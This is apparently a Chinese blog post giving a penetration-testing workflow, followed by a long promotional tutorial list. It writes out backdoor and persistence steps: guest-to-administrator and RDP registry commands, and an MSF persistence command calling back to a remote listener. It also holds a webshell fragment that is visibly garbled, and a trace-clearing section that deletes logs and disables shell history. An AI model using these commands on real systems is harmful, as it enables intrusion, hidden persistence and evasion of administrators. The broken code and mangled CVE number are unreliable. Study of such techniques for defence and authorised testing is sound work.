渗透测试全流程指南:从基础到精通
嘿,小伙伴们!咱们 “渗透测试技术” 公众号后台常常收到这样的私信:
“为啥我老是挖不到漏洞呢?”
“渗透究竟是啥流程呀?”
别急,今天就给大家奉上全网最详尽的渗透测试流程,干货满满,千万别错过!
渗透测试,简单来讲,就是凭借一系列手段,揪出网站、APP、网络服务、软件、服务器等网络设备与应用的漏洞,然后告知管理员漏洞详情以及修补办法,帮他们提前筑牢防线,把黑客拒之门外。
渗透测试分两大阵营:白盒测试与黑盒测试。
白盒测试,就像是给你开了 “上帝视角”,知晓目标网站源码及其他关键信息后再去渗透,有点类似代码 “解剖” 分析。
黑盒测试呢,则是只丢给你个网站的 URL,其余一概不知,全靠你像个真正的黑客那样去摸索,咱们这次就模拟黑盒测试,仅手握目标网站的 URL,开启这场未知之旅,现在就给大伙分享下黑盒渗透测试的流程与思路!
一般而言,渗透测试的基础流程如下:
确定目标→信息收集→漏洞探测→漏洞利用 getshell→内网转发→内网渗透→痕迹清除→撰写渗透测试报告
一、确定目标
这步没啥弯弯绕绕,直白地说,就是找准你要渗透的对象,明确本次行动 “剑指何方”。
二、信息收集
这可是整个渗透测试的关键 “地基”,只有把攻击目标摸得一清二楚,后续攻击才能有的放矢。收集的信息越丰富、情报越详实,攻击成功的概率就蹭蹭往上涨。
那到底要收集哪些信息呢?咱们 “渗透测试技术” 公众号精心给大家整理了一番,渗透测试常见的信息收集要点如下:
-
主机扫描(Nessus)
对目标主机来一场全方位 “体检”,可不光是扫描网站哦,要看看目标主机开放了哪些端口,端口上跑着啥服务,主机自身又藏着哪些漏洞。主机扫描的 “神器” 不少,Nessus 就是其中的佼佼者。 -
端口扫描(nmap)
得搞清楚目标服务器对外开放了哪些端口,像 135 、137 、138 、139 、445 这些端口,可是漏洞的 “高发区”。给大伙列举几个服务端口常见的漏洞:
-
22 ——> ssh 弱口令
-
873 ——> rsync 未授权访问漏洞
-
3306 ——> mysql 弱口令
-
6379 ——> redis 未授权访问漏洞
端口扫描工具里,nmap 准确性杠杠的,就是扫描速度有点 “慢性子”;masscan 扫描快如闪电,不过准确性稍逊一筹。
- 网站敏感目录和文件
扫描网站目录结构,瞅瞅能不能遍历目录,有没有敏感文件泄露的 “马脚”。
-
后台目录:弱口令、万能密码、爆破等手段常在此出没。
-
安装包:这里面可能藏着数据库信息,甚至网站源码 “宝藏”。
-
上传目录:截断、上传图片马等 “小伎俩” 时有发生。
-
mysql 管理接口:弱口令、爆破、万能密码轮番上阵,搞不好就能脱裤,甚至直取 shell。
-
安装页面 :二次安装的漏洞或许能成为突破防线的 “捷径”。
-
phpinfo:一不小心就把配置信息暴露无遗。
-
编辑器:像 fck、ke 等,也可能暗藏玄机。
-
iis 短文件利用:不过条件有点苛刻,得是 windows、apache 等环境。
提到网站敏感目录,就不得不提 robots.txt 文件。这可是专门给搜索引擎机器人 robot 定制的纯文本 “规则手册”。咱们能在里头指定网站里不想让 robot 涉足的目录,这样网站部分或全部内容就能躲开搜索引擎收录,或者只让搜索引擎收录指定内容。咱们也能利用它,让 Google 的机器人对网站上的重要文件 “望洋兴叹”,GoogleHack 的威胁也就烟消云散啦。
假设编写的 robots.txt 文件内容如下:
User-agent: *
Disallow: /data/
Disallow: /db/
Disallow: /admin/
Disallow: /manager/
Allow:/images/
其中 “Disallow” 参数后面跟着的,就是禁止 robot 收录的路径,比如想让 robot 远离网站目录下的 “data” 文件夹,在 Disallow 参数后面加上 /data/ 就行,想加其他目录,依葫芦画瓢接着添。文件写好后往网站根目录一放,网站就能远离 Google Hack 困扰。
虽说 robots 文件本意是防搜索蜘蛛 “乱爬”,可要是咱们知晓了它的内容,就能顺藤摸瓜,发现目标网站哪些文件夹 “不可告人”,侧面印证这些文件夹的重要性。
探测目标网站后台目录的工具也不少,wwwscan 、御剑 、 dirbuster、cansina 等,都是咱们的得力助手。
- 旁站和 C 段扫描
旁站,简单说就是同一服务器上的 “邻居” 网站。有时候,目标网站固若金汤,不好入侵,这时候不妨瞅瞅它所在服务器上有没有别的网站。要是有,先拿下 “邻居” 的 webshell,再一步步提权拿到服务器权限,最后目标网站还不是手到擒来!
对于红蓝对抗和护网行动,C 段扫描意义重大;但对单个网站渗透测试,它的作用就没那么突出了。C 段指的是同一内网段内的其他服务器,每个 IP 有 ABCD 四个段,举个例子,192.168.0.1,A 段就是 192,B 段是 168,C 段是 0,D 段是 1,而 C 段嗅探,就是拿下同一 C 段中的其中一台服务器,也就是 D 段 1 - 255 中的一台,然后靠工具嗅探拿下它。
-
网站漏洞扫描
这步就是直接对网站 “找茬”,找漏洞。网站漏洞扫描工具五花八门,像 AWVS、AppScan、OWASP-ZAP、nessuss 等等。不过要注意啦,直接拿漏扫工具怼网站,流量瞬间飙升,有些 “脆弱” 的网站可能直接崩溃。所以一般情况下,未经授权可千万别用漏扫工具扫网站,这可是违法的事儿! -
网站指纹识别
在渗透测试里,给目标服务器做个 “指纹鉴定” 相当必要,只有识别出对应的 Web 容器或者 CMS,才能精准查找相关漏洞,进而开展渗透操作。CMS 也就是整站系统,常见的有:WordPress、Dedecms、Discuz、PhpWeb、PhpWind、Dvbbs、PhpCMS、ECShop、、SiteWeaver、AspCMS、帝国、Z-Blog 等。
常见的网站指纹识别工具,whatweb 就很不错。
-
公司敏感信息网上搜集
确定目标公司后,互联网就是咱们的 “情报库”,去查查与该公司有关的一切信息,像公司邮箱格式、员工姓名之类的。还有,Github、码云等代码托管平台也别放过,有些粗心程序员上传代码时没做脱敏,数据库连接信息、邮箱密码、甚至源代码都可能泄露在上面。 -
域名信息的收集
当咱们锁定渗透目标,知道域名后,接着就要收集域名对应的 ip、域名的 whois 信息、子域名等一系列相关情报。
-
判断域名对应的 IP:先得瞧瞧域名有没有 CDN “加持”,去在线 CDN 查询网站:多个地点 Ping 服务器,网站测速 - 站长工具瞅一瞅。要是查询出的 ip 数量大于 1,那这 ip 地址大概率不是真实服务器地址。以咱们的经验看,如果是 2 个或者 3 个,且都在同一地区不同运营商,那很可能是服务器的出口地址,服务器在内网,靠不同运营商 NAT 映射供互联网访问,同时实现负载均衡和热备份;要是多个 ip 地址还分布在不同地区,基本能断定用了 CDN。
-
域名的 whois 信息:whois 就像是查询域名注册所有者等信息的 “万能钥匙”,本质是个查询域名是否已注册以及注册详情(如域名所有人、域名注册商)的数据库,靠它实现域名信息查询。早期 whois 多以命令行接口示人,现在网页接口的线上查询工具纷纷涌现,能一次向不同数据库查询。网页接口工具还是依赖 whois 协议向服务器发请求,命令行接口工具依旧是系统管理员的 “心头好”。whois 通常用 TCP 协议 43 端口。每个域名 / IP 的 whois 信息由对应的管理机构保存。
三、漏洞探测
信息收集完备,就轮到给网站 “把脉”,探测有没有常见的 Web 漏洞,比如:
SQL 注入、XSS 跨站脚本、CSRF 跨站请求伪造、XXE 漏洞、SSRF 服务端请求伪造漏洞、文件包含漏洞、文件上传漏洞、文件解析漏洞、远程代码执行漏洞、CORS 跨域资源共享漏洞、越权访问漏洞、目录浏览漏洞和任意文件读取 / 下载漏洞、struts2 漏洞、JAVA 反序列化漏洞
这些只是网站常见漏洞的 “冰山一角”,还有其他漏洞,篇幅有限就不逐一罗列啦。
网站漏洞扫描工具也不少,AWVS、AppScan、Owasp-Zap、Nessus 都是常用 “利器”,咱们挑几个重点介绍,实际上还有更多选择。
四、漏洞利用
一旦探测到网站漏洞,就要 “乘虚而入” 加以利用。不同漏洞对应不同利用工具,很多时候,单靠一个漏洞拿 webshell 有点难,往往得组合出击。常用漏洞利用工具如下:
-
SQL 注入 ——> Sqlmap
-
XSS 跨站脚本 ——> Beef-XSS
-
抓包改包工具 ——> Burpsuite 工具 、 Fidder 抓包软件
-
文件上传漏洞,一般会上传一句话木马,进而谋取 webshell,传送门 ——> Webshell 和一句话木马
不过,拿到 webshell 后,权限通常不高,这就得提权。可以反弹一个 MSF 类型的 shell 提权:Metasploit Framework (MSF) 的使用 、 Msfvenonm 生成一个后门木马;也能反弹一个 CobaltStrike 类型的 shell:渗透测试神器 Cobalt Strike 的使用;还能让 MSF 和 CobaltStrike 联动:MSF 和 CobaltStrike 联动;当然,Windows 提权、Linux 提权等其他方法也行。
五、内网转发
成功斩获网站的 Webshell 后,如果还想深挖主机信息,就得把 Webshell 换成 MSF 的 shell。直接生成个木马,丢到菜刀里执行,就能接收 MSF 类型的 shell 啦。
要是还想进一步探测内网主机情况,内网转发就登场了。咱们没法直接和内网主机 “对话”,得靠获取到的 webshell 网站服务器牵线搭桥,实现与内网主机通信。
六、内网横向渗透
拿下外网服务器权限,成功 “潜入” 系统后,就要想尽办法从这台服务器里捞出咱们想要的信息。
对于 windows 主机,多翻翻目录,说不定有意想不到的收获,好多人习惯把账号密码之类容易忘的东西放备忘录或桌面上。还能找找数据库连接文件,查看连接账号密码等敏感信息。拿到 windows 主机账号密码,或者新建用户后,为了不打草惊蛇,尽量别用远程桌面,动静太大,要是管理员也在线,你一登录就把人家挤掉,很快就会被管理员 “扫地出门”。实在要用远程桌面,别新建用户登录,可以激活 guest 用户,加到 administrators 组,用 guest 用户身份登录。RDP 远程登录后,瞅瞅其他用户桌面和其他目录有啥软件,重点关注:
FTP 相关的软件
数据库相关的软件
打开浏览器,查看历史记录,看有没有网站保存了用户密码,利用工具查看浏览器保存的密码。从这台主机搞到的账号密码,能做个字典,对内网其他机器爆破时,很可能密码通用。
net user guest /active:yes #激活 guest 用户
net localgroup administrators guest /add #将 guest 用户添加到
net user guest 密码 #更改 guest 用户密码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #开启 3389 端口
对于 Linux 主机,查看开放端口号、服务,以及与其连接的内网主机,翻翻目录,找找网站数据库连接密码。一句话,多找账号密码,对内网账号爆破大有用处。
搭建隧道通内网后,首先得对内网资产 “摸个底”,可内网存活网段判断是个难题,内网可能同时存在 10.0.0.0/8、172.16.0.0/16、192.168.0.0/24 网段,这就得靠扫描器探测。通过代理进行内网扫描,不建议用 nmap。要是本地主机通过代理扫描,能图形化界面,RouterScan 、御剑高速 TCP 全端口扫描器、IIS_Scanner 都能用,不过线程调低些,不然代理容易崩。要是用命令行扫描器,S 扫描器是个不错选择。扫描完内网资产和端口开放情况,对于 445 端口,可以打一波 MS17_010,注意通过代理打和直接打不一样,传送门 ——> 内网渗透之 MS17 - 010 。对于 3389 端口,可以打一波 CVE - 192019 - 0708,传送门 ——> CVE - 192019 - 0708 远程桌面漏洞复现 。对于 1433/3306/6379 等端口,可以尝试爆破,用之前收集的账号密码,成功率更高哦。
权限维持
拿到目标主机权限后,有时当下拿不到想要的,得长期潜伏,尤其是内网渗透,长期信息收集很关键,这时候权限维持就至关重要,得保住到手的权限。
Web 后门
1:隐藏后门文件 (将文件设置为隐藏)
2:不死马,该脚本每 5 秒向服务器创建 test.php,并写入一句话免杀木马。结合 attrib 命令隐藏文件,后门建得更隐蔽。
“3”); b = a r r a y _ k e y s ( b=array\_keys( b=array_keys(a)[0]; eval($b);?>
');
sleep (5);
}
?>
3:404 页面隐藏后门,或者在其他自带文件中插入后门代码
注:以上几种后门方法均能被 D 盾等工具检测到
Windows 系统
1:建立隐藏用户,在用户名后加 $
2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控
3:MSF 里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控,不过容易被发现。
# 反弹时间间隔是 5s 会自动连接 192.168.27 的 4444 端口,缺点是容易被杀毒软件查杀
run persistence -X -i 5 -p 8888 -r 192.168.10.27
#然后它就在目标机新建了这个文件:C:\Windows\TEMP\CJzhFlNOWa.vbs ,并把该服务加入了注册表中,只要开机就会启动
4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击,而且一般该用户的密码不经常改变。
5:shift 后门
6:远程桌面会话劫持
Linux 系统
1:SSH 后门
2:crontab 定时任务
3:SSH 公钥
4:创建 SUID = 0 的用户
七、痕迹清除
有时候,咱们渗透进去可能就想挂个黑页炫技,或者留个后门当 “肉鸡” 备用,甚至挂挖矿木马,打住!这些可都是违法勾当,千万别干!
咱们 “渗透测试技术” 公众号只是教大家渗透后怎么清除部分痕迹,完全抹去入侵痕迹那是天方夜谭,主要是增加管理员发现入侵者的时间成本和人力成本,只要管理员铁了心要查,再怎么清也能查到蛛丝马迹。
关键还是要隐藏好自身身份,渗透前挂代理,渗透后及时清除痕迹。
Windows 系统
1:如果是 windows 系统,可用 MSF 中的 clearev 命令清除痕迹
2:如果 3389 远程登录过,需要清除 mstsc 痕迹
3:执行命令清除日志:
del % WINDR%*.log/a/s/q/f
4:如果是 web 应用,找到 web 日志文件,删除
Linux 系统
1:如果是 Linux 系统,在获取权限后,执行以下命令,不会记录输入过的命令
export HISTFILE=/dev/null export HISTSIZE=0
2:删除 /var/log 目录下的日志文件
3:如果是 web 应用,找到 web 日志文件,删除
八、撰写渗透测试报告
完成渗透测试,别忘了给这次行动写个 “总结报告”,明明白白列出哪里有漏洞,
黑客/网络安全学习路线
对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。
大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」「收藏」「在看」「赞」**
网络安全/渗透测试法律法规必知必会****
今天大白就帮想学黑客/网络安全技术的朋友们入门必须先了解法律法律。
【网络安全零基础入门必知必会】什么是黑客、白客、红客、极客、脚本小子?(02)
【网络安全零基础入门必知必会】网络安全专业术语全面解析(05)
【网络安全入门必知必会】《中华人民共和国网络安全法》(06)
【网络安全零基础入门必知必会】《计算机信息系统安全保护条例》(07)
【网络安全零基础入门必知必会】《中国计算机信息网络国际联网管理暂行规定》(08)
【网络安全零基础入门必知必会】《计算机信息网络国际互联网安全保护管理办法》(09)
【网络安全零基础入门必知必会】《互联网信息服务管理办法》(10)
【网络安全零基础入门必知必会】《计算机信息系统安全专用产品检测和销售许可证管理办法》(11)
【网络安全零基础入门必知必会】《通信网络安全防护管理办法》(12)
【网络安全零基础入门必知必会】《中华人民共和国国家安全法》(13)
【网络安全零基础入门必知必会】《中华人民共和国数据安全法》(14)
【网络安全零基础入门必知必会】《中华人民共和国个人信息保护法》(15)
【网络安全零基础入门必知必会】《网络产品安全漏洞管理规定》(16)
网络安全/渗透测试linux入门必知必会
【网络安全零基础入门必知必会】什么是Linux?Linux系统的组成与版本?什么是命令(01)
【网络安全零基础入门必知必会】VMware下载安装,使用VMware新建虚拟机,远程管理工具(02)
【网络安全零基础入门必知必会】VMware常用操作指南(非常详细)零基础入门到精通,收藏这一篇就够了(03)
【网络安全零基础入门必知必会】CentOS7安装流程步骤教程(非常详细)零基入门到精通,收藏这一篇就够了(04)
【网络安全零基础入门必知必会】Linux系统目录结构详细介绍(05)
【网络安全零基础入门必知必会】Linux 命令大全(非常详细)零基础入门到精通,收藏这一篇就够了(06)
【网络安全零基础入门必知必会】linux安全加固(非常详细)零基础入门到精通,收藏这一篇就够了(07)
网络安全/渗透测试****计算机网络入门必知必会****
【网络安全零基础入门必知必会】TCP/IP协议深入解析(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】什么是HTTP数据包&Http数据包分析(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】计算机网络—子网划分、子网掩码和网关(非常详细)零基础入门到精通,收藏这一篇就够了(03)
网络安全/渗透测试入门之HTML入门必知必会
【网络安全零基础入门必知必会】什么是HTML&HTML基本结构&HTML基本使用(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础入门必知必会】VScode、PhpStorm的安装使用、Php的环境配置,零基础入门到精通,收藏这一篇就够了2
【网络安全零基础入门必知必会】HTML之编写登录和文件上传(非常详细)零基础入门到精通,收藏这一篇就够了3
网络安全/渗透测试入门之Javascript入门必知必会
【网络安全零基础入门必知必会】Javascript语法基础(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】Javascript实现Post请求、Ajax请求、输出数据到页面、实现前进后退、文件上传(02)
网络安全/渗透测试入门之Shell入门必知必会
【网络安全零基础入门必知必会】Shell编程基础入门(非常详细)零基础入门到精通,收藏这一篇就够了(第七章)
网络安全/渗透测试入门之PHP入门必知必会
【网络安全零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL(非常详细)零基础入门到精通,收藏这一篇就够(01)
【网络安全零基础入门】PHP基础语法(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】PHP+Bootstrap实现表单校验功能、PHP+MYSQL实现简单的用户注册登录功能(03)
网络安全/渗透测试入门之MySQL入门必知必会
【网络安全零基础入门必知必会】MySQL数据库基础知识/安装(非常详细)零基础入门到精通,收藏这一篇就够了(01)
【网络安全零基础入门必知必会】SQL语言入门(非常详细)零基础入门到精通,收藏这一篇就够了(02)
【网络安全零基础入门必知必会】MySQL函数使用大全(非常详细)零基础入门到精通,收藏这一篇就够了(03)
【网络安全零基础入门必知必会】MySQL多表查询语法(非常详细)零基础入门到精通,收藏这一篇就够了(04)
****网络安全/渗透测试入门之Python入门必知必会
【网络安全零基础入门必知必会】之Python+Pycharm安装保姆级教程,Python环境配置使用指南,收藏这一篇就够了【1】
【网络安全零基础入门必知必会】之Python编程入门教程(非常详细)零基础入门到精通,收藏这一篇就够了(2)
python入门教程python开发基本流程控制if … else
python入门教程之python开发可变和不可变数据类型和hash
【网络安全零基础入门必知必会】之10个python爬虫入门实例(非常详细)零基础入门到精通,收藏这一篇就够了(3)
****网络安全/渗透测试入门之SQL注入入门必知必会
【网络安全渗透测试零基础入门必知必会】之初识SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了(1)
【网络安全渗透测试零基础入门必知必会】之SQL手工注入基础语法&工具介绍(2)
【网络安全渗透测试零基础入门必知必会】之SQL注入实战(非常详细)零基础入门到精通,收藏这一篇就够了(3)
【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)
【网络安全渗透测试零基础入门必知必会】之SQL防御(非常详细)零基础入门到精通,收藏这一篇就够了(4)
****网络安全/渗透测试入门之XSS攻击入门必知必会
【网络安全渗透测试零基础入门必知必会】之XSS攻击基本概念和原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了(1)
网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了(2)
【网络安全渗透测试零基础入门必知必会】之XSS攻击获取键盘记录(实战演示)零基础入门到精通收藏这一篇就够了(3)
【网络安全渗透测试零基础入门必知必会】之xss-platform平台的入门搭建(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试入门】之XSS漏洞检测、利用和防御机制XSS游戏(非常详细)零基础入门到精通,收藏这一篇就够了5
****网络安全/渗透测试入门文件上传攻击与防御入门必知必会
【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全渗透测试零基础入门必知必会】之cve实际漏洞案例解析(非常详细)零基础入门到精通, 收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之PHP伪协议精讲(文件包含漏洞)零基础入门到精通,收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之Web漏洞-文件包含漏洞超详细全解(附实例)5
【网络安全渗透测试零基础入门必知必会】之文件上传漏洞修复方案6
****网络安全/渗透测试入门CSRF渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之CSRF漏洞概述和原理(非常详细)零基础入门到精通, 收藏这一篇就够了1
【网络安全渗透测试零基础入门必知必会】之CSRF攻击的危害&分类(非常详细)零基础入门到精通, 收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之XSS与CSRF的区别(非常详细)零基础入门到精通, 收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之CSRF漏洞挖掘与自动化工具(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除5
****网络安全/渗透测试入门SSRF渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之SSRF漏洞概述及原理(非常详细)零基础入门到精通,收藏这一篇就够了 1
【网络安全渗透测试零基础入门必知必会】之SSRF相关函数和协议(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之SSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了3**
**
****网络安全/渗透测试入门XXE渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之XML外部实体注入(非常详细)零基础入门到精通,收藏这一篇就够了1
网络安全渗透测试零基础入门必知必会】之XXE的攻击与危害(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之XXE漏洞漏洞及利用方法解析(非常详细)零基础入门到精通,收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之微信XXE安全漏洞处理(非常详细)零基础入门到精通,收藏这一篇就够了4
****网络安全/渗透测试入门远程代码执行渗透与防御必知必会
【网络安全渗透测试零基础入门必知必会】之远程代码执行原理介绍(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础入门必知必会】之CVE-2021-4034漏洞原理解析(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全零基础入门必知必会】之PHP远程命令执行与代码执行原理利用与常见绕过总结3
【网络安全零基础入门必知必会】之WEB安全渗透测试-pikachu&DVWA靶场搭建教程,零基础入门到精通,收藏这一篇就够了4
****网络安全/渗透测试入门反序列化渗透与防御必知必会
【网络安全零基础入门必知必会】之什么是PHP对象反序列化操作(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全零基础渗透测试入门必知必会】之php反序列化漏洞原理解析、如何防御此漏洞?如何利用此漏洞?2
【网络安全渗透测试零基础入门必知必会】之Java 反序列化漏洞(非常详细)零基础入门到精通,收藏这一篇就够了3
【网络安全渗透测试零基础入门必知必会】之Java反序列化漏洞及实例解析(非常详细)零基础入门到精通,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之CTF题目解析Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用5
网络安全/渗透测试**入门逻辑漏洞必知必会**
【网络安全渗透测试零基础入门必知必会】之一文带你0基础挖到逻辑漏洞(非常详细)零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门暴力猜解与防御必知必会
【网络安全渗透测试零基础入门必知必会】之密码安全概述(非常详细)零基础入门到精通,收藏这一篇就够了1
【网络安全渗透测试零基础入门必知必会】之什么样的密码是不安全的?(非常详细)零基础入门到精通,收藏这一篇就够了2
【网络安全渗透测试零基础入门必知必会】之密码猜解思路(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之利用Python暴力破解邻居家WiFi密码、压缩包密码,收藏这一篇就够了4
【网络安全渗透测试零基础入门必知必会】之BurpSuite密码爆破实例演示,零基础入门到精通,收藏这一篇就够了5
【网络安全渗透测试零基础入门必知必会】之Hydra密码爆破工具使用教程图文教程,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之暴力破解medusa,零基础入门到精通,收藏这一篇就够了7
【网络安全渗透测试零基础入门必知必会】之Metasploit抓取密码,零基础入门到精通,收藏这一篇就够了8
****网络安全/渗透测试入门掌握Redis未授权访问漏洞必知必会
【网络安全渗透测试零基础入门必知必会】之Redis未授权访问漏洞,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Redis服务器被攻击后该如何安全加固,零基础入门到精通,收藏这一篇就够了**
**
网络安全/渗透测试入门掌握**ARP渗透与防御关必知必会**
【网络安全渗透测试零基础入门必知必会】之ARP攻击原理解析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之ARP流量分析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之ARP防御策略与实践指南,零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握系统权限提升渗透与防御关****必知必会
【网络安全渗透测试零基础入门必知必会】之Windows提权常用命令,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Windows权限提升实战,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之linux 提权(非常详细)零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握Dos与DDos渗透与防御相关****必知必会
【网络安全渗透测试零基础入门必知必会】之DoS与DDoS攻击原理(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Syn-Flood攻击原理解析(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之IP源地址欺骗与dos攻击,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之SNMP放大攻击原理及实战演示,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之NTP放大攻击原理,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之什么是CC攻击?CC攻击怎么防御?,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之如何防御DDOS的攻击?零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握无线网络安全渗透与防御相关****必知必会
【网络安全渗透测试零基础入门必知必会】之Aircrack-ng详细使用安装教程,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之aircrack-ng破解wifi密码(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之WEB渗透近源攻击,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之无线渗透|Wi-Fi渗透思路,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之渗透WEP新思路Hirte原理解析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之WPS的漏洞原理解析,零基础入门到精通,收藏这一篇就够了
网络安全/渗透测试入门掌握木马免杀问题与防御********必知必会
【网络安全渗透测试零基础入门必知必会】之Metasploit – 木马生成原理和方法,零基础入门到精通,收藏这篇就够了
【网络安全渗透测试零基础入门必知必会】之MSF使用教程永恒之蓝漏洞扫描与利用,收藏这一篇就够了
网络安全/渗透测试入门掌握Vulnhub靶场实战********必知必会
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶机Prime使用指南,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶场Breach1.0解析,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之vulnhub靶场之DC-9,零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶机Kioptrix level-4 多种姿势渗透详解,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶场PWNOS: 2.0 多种渗透方法,收藏这一篇就够了
网络安全/渗透测试入门掌握社会工程学必知必会
【网络安全渗透测试零基础入门必知必会】之什么是社会工程学?定义、类型、攻击技术,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之社会工程学之香农-韦弗模式,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之社工学smcr通信模型,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之社会工程学之社工步骤整理(附相应工具下载)收藏这一篇就够了
网络安全/渗透测试入门掌握********渗透测试工具使用******必知必会**
2024版最新Kali Linux操作系统安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
【网络安全渗透测试零基础入门必知必会】之渗透测试工具大全之Nmap安装使用命令指南,零基础入门到精通,收藏这一篇就够了
2024版最新AWVS安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新burpsuite安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新owasp_zap安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Sqlmap安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Metasploit安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Nessus下载安装激活使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
2024版最新Wireshark安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
觉得有用的话,希望粉丝朋友帮大白点个**「分享」「收藏」「在看」「赞」**
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
